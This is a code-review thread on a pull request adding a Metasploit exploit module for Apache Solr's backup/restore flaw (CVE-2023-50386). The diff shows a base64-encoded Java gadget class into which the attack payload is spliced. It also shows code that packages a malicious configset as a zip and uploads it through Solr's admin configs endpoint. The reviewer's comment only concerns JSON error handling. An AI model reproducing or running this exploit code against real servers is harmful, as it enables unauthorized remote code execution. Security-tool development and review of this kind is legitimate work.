modules/exploits/linux/http/apache_solr_backup_restore.rb

```diff
@@ -0,0 +1,374 @@
+    gadget << 'bGRlcgEACFJlZGlyZWN0ACEAHwACAAAAAAACAAEABQAGAAEAXQAAAB0AAQABAAAABSq3AAGxAAAA'
+    gadget << 'AQBeAAAABgABAAAADgAIAF8ABgABAF0AAAEaAAYACgAAAK8SBxIJtgALSyoEtgARKgG2ABfAAAdM'
+    gadget << 'EgK2ABtNEh9OKxIMEiG2AAu2ACM3BCstFgQstgAnVwa9ACtZAxItU1kEEi9TWQUSMVM6BhIzuAA1'
+    gadget << 'OgcZBxI5CL0ADFkDEjtTWQQSPVNZBRIrU1kGEj9TWQeyAEFTtgBHOggZCAS2AEsZCBkHCL0AAlkD'
+    gadget << 'GQZTWQQBU1kFAVNZBgFTWQcDuABOU7YAUsAAVjoJpwAISyq2AFqxAAEAAACmAKkAWAACAF4AAABC'
+    gadget << 'ABAAAAASAAgAEwANABQAFgAVABwAFgAfABcALAAYADUAGgBKABsAUQAcAHgAHQB+AB4ApgAhAKkA'
+    gadget << 'HwCqACAArgAiAGAAAAAJAAL3AKkHAFgEAAIAYQAAAAIAYgBjAAAACgABAGQAZgBoBAk='
+    gadget = Rex::Text.decode_base64(gadget)
+    # Because we're inserting the payload into a compiled java class, replace spaces with ${IFS}
+    pload = payload.encoded.gsub(/\s+/, '${IFS}')
+    # Replace 'confname' with our randomized 8 character configuration name
+    gadget.sub!('confname', configuration1_name)
+    # Replace the placeholder payload with our packed payload which is prefixed with it's size.
+    gadget.sub!("\x00\x12METASPLOIT_PAYLOAD", packed_payload(pload))
+  end
+
+  def packed_payload(pload)
+    "#{[pload.length].pack('n')}#{pload}"
+  end
+
+  def create_zip
+    zip_file = Rex::Zip::Archive.new
+    directory_to_zip = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'conf')
+
+    Dir.glob(File.join(directory_to_zip, '**', '*')).each do |file_path|
+      if File.file?(file_path)
+        relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path
+        file_contents = File.read(file_path)
+        zip_file.add_file(relative_path, file_contents)
+      elsif File.directory?(file_path)
+        relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path
+        zip_file.add_file(relative_path, nil, recursive: true)
+      end
+    end
+
+    zip_file
+  end
+
+  def upload_conf(file_name, zip_archive, conf_name)
+    mime = Rex::MIME::Message.new
+    mime.add_part(zip_archive, 'application/octet-stream', 'binary', "form-data; filename=\"#{file_name}\"")
+
+    res = solr_post({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),
+      'method' => 'POST',
+      'ctype' => 'application/octet-stream',
+      'data' => zip_archive,
+      'auth' => @auth_string,
+      'vars_get' => {
+        'action' => 'UPLOAD',
+        'name' => conf_name
+      }
+    })
+
+    fail_with(Failure::UnexpectedReply, 'No response from the target') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
+
+    data = res.get_json_document
+    if res.code == 200 && data['responseHeader']['status'] == 0
+      print_good('Uploaded configuration successfully')
+    elsif data['error']['msg']
+      fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")
```

Comment:
Using the `#dig` method here would be more forgiving if the JSON response is malformed. I'd recommend using the pattern elsewhere as well.

```suggestion
    if data.dig('responseHeader', 'status') == 0
      print_good('Uploaded configuration successfully')
    elsif data.dig('error', 'msg')
      fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")
```

Also `res.code == 200` has already been validated.